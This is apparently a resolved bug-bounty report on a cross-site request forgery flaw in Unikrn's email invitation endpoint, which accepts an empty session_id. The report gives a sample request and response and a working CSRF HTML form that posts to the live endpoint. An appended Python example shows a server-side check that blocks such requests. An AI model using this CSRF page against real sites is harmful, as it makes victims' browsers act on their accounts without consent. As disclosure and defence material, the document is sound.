session_id is not being validated at email invitation endpoint
Unikrn
Reported by tolo7010
Vulnerability Details
Technical details and impact analysis
session_id is not being validated at email invitation endpoint
request sample:
```
POST /apiv1/inviteemail HTTP/1.1
Host: unikrn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://unikrn.com/profile
Content-Type: application/json
Application-Version: v3.9.1-1476-g6500a2c
Content-Length: 51
Cookie: ...
Connection: close

{"email":"[email protected]","session_id":""}
```
response sample:
```
HTTP/1.1 200 OK
Date: Thu, 23 Nov 2017 14:26:58 GMT
Content-Type: application/json
Content-Length: 150
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 86400
Cache-Control: no-store, no-cache, must-revalidate
CI: M-production C-1 V-1.2.0
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Vary: Accept-Encoding
Vary: Origin
X-XSS-Protection: 1; mode=block
Server: cloudflare-nginx
CF-RAY: 3c24ce767b1e340f-HKG

{"error":false,"success":true,"msg":"We invited [email protected] for you","msg_trans":"We invited [email protected] for you","data":null}
```
CSRF Page:
```
<!doctype html>
<html>
<head>
</head>
<body>
<form action="https://unikrn.com/apiv1/inviteemail" method="POST">
<input type="hidden" name="email" id="email" value="[email protected]">
<input type="hidden" name="session_id" id="session_id" value="">
<input type="submit">
</form>
</body>
</html>
```
## Impact
The victim email gets filled on behalf of legitimate users visiting the CSRF page.
Report Details
State: Closed
Substate: Resolved
Weakness: Cross-Site Request Forgery (CSRF)
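A server-side check that rejects both the empty `session_id` request and the cross-site form post shown in the report, as an added example that is not part of the original report or Unikrn's code. It assumes `session_id` is meant to be a token bound to the cookie session; the session store, token value, function name and sample addresses are constructed for illustration.

```python
import hmac
import json

# Constructed server-side store: cookie session key -> session_id issued to it.
SESSIONS = {"cookie-abc": "5f2c9e1d7a"}
ALLOWED_ORIGINS = {"https://unikrn.com"}

def check_invite_request(headers, cookie_session, raw_body):
    """Return (status, reason) for a POST to the invite endpoint."""
    # An HTML form cannot submit application/json, so require it.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return 415, "content type must be application/json"
    # Reject cross-site origins when the browser supplies the header.
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return 403, "cross-site origin"
    expected = SESSIONS.get(cookie_session)
    if expected is None:
        return 401, "no authenticated session"
    try:
        body = json.loads(raw_body)
    except ValueError:
        return 400, "malformed JSON"
    if not isinstance(body, dict):
        return 400, "malformed JSON"
    supplied = body.get("session_id")
    # The empty value from the report must fail, as must a missing one.
    if not isinstance(supplied, str) or not supplied:
        return 403, "session_id missing or empty"
    # Constant-time comparison with the value bound to this cookie session.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "session_id does not match session"
    return 200, "ok"

if __name__ == "__main__":
    json_hdrs = {"Content-Type": "application/json", "Origin": "https://unikrn.com"}
    form_hdrs = {"Content-Type": "application/x-www-form-urlencoded",
                 "Origin": "https://other.example"}
    # Constructed requests mirroring the shapes in the report.
    print(check_invite_request(json_hdrs, "cookie-abc",
                               '{"email":"invitee@example.test","session_id":""}'))
    print(check_invite_request(form_hdrs, "cookie-abc", "email=x&session_id="))
    print(check_invite_request(json_hdrs, "cookie-abc",
                               '{"email":"invitee@example.test","session_id":"5f2c9e1d7a"}'))
```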